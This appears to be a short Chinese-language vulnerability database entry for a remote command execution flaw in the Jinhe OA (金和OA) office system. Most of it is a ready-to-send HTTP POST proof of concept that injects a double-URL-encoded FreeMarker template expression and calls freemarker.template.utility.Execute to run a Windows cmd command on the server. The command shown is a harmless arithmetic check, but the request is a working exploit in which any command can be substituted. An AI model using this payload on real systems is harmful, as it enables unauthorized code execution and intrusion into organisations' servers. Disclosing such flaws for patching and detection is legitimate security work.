金和OA portalwb-con-template-viewcontemplate 远程命令执行

日期: 2024-03-13 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA portalwb-con-template-viewcontemplate 远程命令执行

PoC代码

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522cmd+/c+set+/a+44255*40057%2522%29%257D%253C%252Fclob%253E&uuid=1

相关漏洞推荐